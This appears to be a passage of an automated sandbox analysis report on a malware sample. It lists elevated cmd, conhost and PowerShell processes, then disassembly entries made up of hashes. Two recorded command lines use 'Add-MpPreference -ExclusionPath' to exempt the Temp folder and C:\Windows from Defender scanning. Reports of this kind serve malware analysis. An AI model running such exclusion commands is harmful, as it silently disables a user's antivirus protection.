                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:181
                                                                                                                                                                Start time:11:42:57
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:182
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:183
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:184
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:185
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:186
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:187
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:188
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:189
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:190
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:191
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:192
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:193
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:194
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:195
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:196
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:197
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:198
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:199
                                                                                                                                                                Start time:11:43:03
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:200
                                                                                                                                                                Start time:11:43:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:201
                                                                                                                                                                Start time:11:43:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:202
                                                                                                                                                                Start time:11:43:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:203
                                                                                                                                                                Start time:11:43:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:204
                                                                                                                                                                Start time:11:43:07
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:205
                                                                                                                                                                Start time:11:43:07
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:206
                                                                                                                                                                Start time:11:43:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:207
                                                                                                                                                                Start time:11:43:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 04CC0942 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: df65267b06524cad8b6a782c3d857d1eee2ca08c33ba89bd2a78c3111470eeea
                                                                                                                                                                  • Instruction ID: b8d3b94817982129c8e08bcf05855971433419542d61ec2ac049d1d1e1eb83f3
                                                                                                                                                                  • Opcode Fuzzy Hash: df65267b06524cad8b6a782c3d857d1eee2ca08c33ba89bd2a78c3111470eeea
                                                                                                                                                                  • Instruction Fuzzy Hash: FFF090A730C010FD7040D1C32624BB667AFE2C5730328882FF14BD6501F1546A847232
                                                                                                                                                                  Function 04CC0A4C Relevance: .7, Instructions: 736COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 907eafe6881db90bac7e00afa1bffebf17cba2c00706839912d55e50caecffe7
                                                                                                                                                                  • Instruction ID: 49030dfa4bca07bec39b963adf8bb9061815e88708a098e4b5cb75947fb34ab5
                                                                                                                                                                  • Opcode Fuzzy Hash: 907eafe6881db90bac7e00afa1bffebf17cba2c00706839912d55e50caecffe7
                                                                                                                                                                  • Instruction Fuzzy Hash: D9D097A2A0C120CC82028CF3801C2392FE6F64122030688BFC0C2CE4A3F114E846E3E1
                                                                                                                                                                  Function 04CC0947 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c8eea830bf4c84fd8ada0e5a39d59f3c6d9ae02fbec5a6b11b808296d888adc7
                                                                                                                                                                  • Instruction ID: d3f5f45ec988df3b9f4bf3de1a893897914de520fda604920aad58a64cbe6096
                                                                                                                                                                  • Opcode Fuzzy Hash: c8eea830bf4c84fd8ada0e5a39d59f3c6d9ae02fbec5a6b11b808296d888adc7
                                                                                                                                                                  • Instruction Fuzzy Hash: BB0147B770C150EEB201D2D316617BA7BEBE6D7320328487FF047CB502E2246A85B232
                                                                                                                                                                  Function 04CC097C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 369af81172b1325042511e436a234d7b5524126d8eab684a083e50c1aa44656c
                                                                                                                                                                  • Instruction ID: 085c1a6e60bb7119de2b5448888fef5673688d91426ec076dfff5554cce3502d
                                                                                                                                                                  • Opcode Fuzzy Hash: 369af81172b1325042511e436a234d7b5524126d8eab684a083e50c1aa44656c
                                                                                                                                                                  • Instruction Fuzzy Hash: C6E09B6374C014ED2540D6C721553356BD7729A23032C453FF14BDB601F5247695B562
                                                                                                                                                                  Function 04CC0981 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a966eec594e2820aa8b6a2ee147e40bf302c17fa61196694b9a7e62bae0126bf
                                                                                                                                                                  • Instruction ID: 95bb8a56cb1be5c2d5554abee659bbe1e43fc229c22e949cac24a37fb1704839
                                                                                                                                                                  • Opcode Fuzzy Hash: a966eec594e2820aa8b6a2ee147e40bf302c17fa61196694b9a7e62bae0126bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 90E0226370C010ED6484DBC752253797BDBB29932032C493FE04BCA901F6287690B632
                                                                                                                                                                  Function 04CC099A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3bd084677d517a08630df28b6595dcc7465d27affdaefc770d705fdc21268f1a
                                                                                                                                                                  • Instruction ID: 065e084c0654a0e7ad7a467e1b5c176efc61974ebe207f489fc1b474135cf2f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd084677d517a08630df28b6595dcc7465d27affdaefc770d705fdc21268f1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE0682378E280EE964097D317283B9FBE7B70521031C09AFE0DBD9002F6242364B332
                                                                                                                                                                  Function 04CC0A28 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 760bbcb6e1c04a680ddc3feee0b646171ea40f72e18e4b0008287af3bca5088f
                                                                                                                                                                  • Instruction ID: 8e2b81bd359b52cf73dc69fa889e08c2a35bb4cd620ec7c140620157bda77af2
                                                                                                                                                                  • Opcode Fuzzy Hash: 760bbcb6e1c04a680ddc3feee0b646171ea40f72e18e4b0008287af3bca5088f
                                                                                                                                                                  • Instruction Fuzzy Hash: 04E0D827A0D594DE8E41C9D371243BB6BA66A54610328053FE05AC9001F514578BB661
                                                                                                                                                                  Function 04CC09EB Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e9eedcf4527dacec85c48dad0cee63acfca795391e9a4f452140fbc3e07ebdf8
                                                                                                                                                                  • Instruction ID: 6e3207e055520f3795d9ae6ba53ca02dd51f9aea880d45ce8186b546f822e5a2
                                                                                                                                                                  • Opcode Fuzzy Hash: e9eedcf4527dacec85c48dad0cee63acfca795391e9a4f452140fbc3e07ebdf8
                                                                                                                                                                  • Instruction Fuzzy Hash: 39D02BB360C940C35640D6C3115D2787BD6F615112308047FD087CA101F812B983F662
                                                                                                                                                                  Function 04CC09C7 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 91eb29c1634d10970f522e23af1a4c00c83f35abc04440815e3c68cc5a151e0f
                                                                                                                                                                  • Instruction ID: ac4b4344073332ef9e5d58cd1ec717db3edf50b4a13138e5fcc1a4394912cb97
                                                                                                                                                                  • Opcode Fuzzy Hash: 91eb29c1634d10970f522e23af1a4c00c83f35abc04440815e3c68cc5a151e0f
                                                                                                                                                                  • Instruction Fuzzy Hash: CFD0A72774C104E95580D6C3622437967D2B25526032C4D3FE04BD6101F12476D5B232
                                                                                                                                                                  Function 04CC09D5 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1527e376da5d4fa3da28a25e40ed81e5eef7bdf58b637ebd2fe2050461e57179
                                                                                                                                                                  • Instruction ID: 42c139cc02cea5546e7c59959c58f25b134730f02a2c5cb26dc0611fa9aa999e
                                                                                                                                                                  • Opcode Fuzzy Hash: 1527e376da5d4fa3da28a25e40ed81e5eef7bdf58b637ebd2fe2050461e57179
